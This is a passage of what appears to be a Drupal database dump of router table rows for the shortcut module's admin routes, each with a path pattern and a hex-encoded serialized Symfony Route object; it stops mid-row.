('entity.shortcut.content_translation_delete', '/admin/config/user-interface/shortcut/link/{shortcut}/translations/delete/{language}', '/admin/config/user-interface/shortcut/link/%/translations/delete', 251, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d2f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a33373a2273686f72746375742e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a383a2273686f7274637574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a383a2273686f7274637574223b613a333a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a383a2273686f7274637574223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131373a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a383a2273686f7274637574223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235313b733a31343a227061747465726e4f75746c696e65223b733a36343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f252f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('entity.shortcut.content_translation_edit', '/admin/config/user-interface/shortcut/link/{shortcut}/translations/edit/{language}', '/admin/config/user-interface/shortcut/link/%/translations/edit', 251, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d2f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a383a2273686f7274637574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a383a2273686f7274637574223b613a333a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a383a2273686f7274637574223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131353a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a383a2273686f7274637574223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235313b733a31343a227061747465726e4f75746c696e65223b733a36323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f252f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('entity.shortcut.content_translation_overview', '/admin/config/user-interface/shortcut/link/{shortcut}/translations', '/admin/config/user-interface/shortcut/link/%/translations', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36363a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d2f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a383a2273686f7274637574223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31333a2273686f72746375742e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a383a2273686f7274637574223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a383a2273686f7274637574223b613a333a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38343a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5b5e2f5d2b2b292f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f252f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut.delete_form', '/admin/config/user-interface/shortcut/link/{shortcut}/delete', '/admin/config/user-interface/shortcut/link/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31353a2273686f72746375742e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31353a2273686f72746375742e64656c657465223b733a383a2273686f7274637574223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a383a2273686f7274637574223b613a323a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37353a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5c642b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut.edit_form', '/admin/config/user-interface/shortcut/link/{shortcut}', '/admin/config/user-interface/shortcut/link/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a2273686f72746375742e64656661756c74223b733a363a225f7469746c65223b733a343a2245646974223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31353a2273686f72746375742e757064617465223b733a383a2273686f7274637574223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a383a2273686f7274637574223b613a323a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.shortcut.link_delete_inline', '/admin/config/user-interface/shortcut/link/{shortcut}/delete-inline', '/admin/config/user-interface/shortcut/link/%/delete-inline', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d2f64656c6574652d696e6c696e65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c73686f72746375745c436f6e74726f6c6c65725c53686f7274637574436f6e74726f6c6c65723a3a64656c65746553686f72746375744c696e6b496e6c696e65223b7d733a31323a22726571756972656d656e7473223b613a333a7b733a31343a225f656e746974795f616363657373223b733a31353a2273686f72746375742e64656c657465223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b733a383a2273686f7274637574223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a383a2273686f7274637574223b613a323a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38333a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5c642b292f64656c6574655c2d696e6c696e65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f64656c6574652d696e6c696e65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35383a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f252f64656c6574652d696e6c696e65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut_set.collection', '/admin/config/user-interface/shortcut', '/admin/config/user-interface/shortcut', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f7274637574223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31323a2273686f72746375745f736574223b733a363a225f7469746c65223b733a393a2253686f727463757473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a2261646d696e69737465722073686f727463757473223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34353a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f7274637574247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f7274637574223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f7274637574223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.shortcut_set.config_translation_overview', '/admin/config/user-interface/shortcut/manage/{shortcut_set}/translate', '/admin/config/user-interface/shortcut/manage/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36393a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31323a2273686f72746375745f736574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38373a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut_set.customize_form', '/admin/config/user-interface/shortcut/manage/{shortcut_set}/customize', '/admin/config/user-interface/shortcut/manage/%/customize', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36393a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f637573746f6d697a65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32323a2273686f72746375745f7365742e637573746f6d697a65223b733a363a225f7469746c65223b733a31303a224c697374206c696e6b73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a2273686f72746375745f7365742e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38373a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b292f637573746f6d697a65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f637573746f6d697a65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31323a2273686f72746375745f736574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35363a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f252f637573746f6d697a65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut_set.delete_form', '/admin/config/user-interface/shortcut/manage/{shortcut_set}/delete', '/admin/config/user-interface/shortcut/manage/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36363a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31393a2273686f72746375745f7365742e64656c657465223b733a363a225f7469746c65223b733a31393a2244656c6574652073686f727463757420736574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31393a2273686f72746375745f7365742e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793